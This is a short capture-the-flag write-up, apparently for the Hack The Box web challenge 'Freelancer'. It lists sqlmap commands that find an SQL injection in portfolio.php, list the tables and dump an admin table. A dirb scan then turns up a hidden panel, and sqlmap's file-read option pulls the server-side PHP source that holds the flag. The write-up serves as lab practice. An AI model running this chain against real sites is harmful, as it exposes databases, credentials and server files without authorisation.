HTB WEB freelancer

Mohamed Ayad
1 min readNov 18, 2019


from source code we found portfolio.php?id=3

so lets try sql injection

sqlmap -u “” — tables

we see table called safeadmin

sqlmap -u “” -T safeadmin — dump

will find hash uncrackable

from source we also found /admininstrat

dirb -X .php

we found the file /panel.php

sqlmap -u “” — file-read=/var/www/html/administat/panel.php then cat that file

below the page u will find the flag

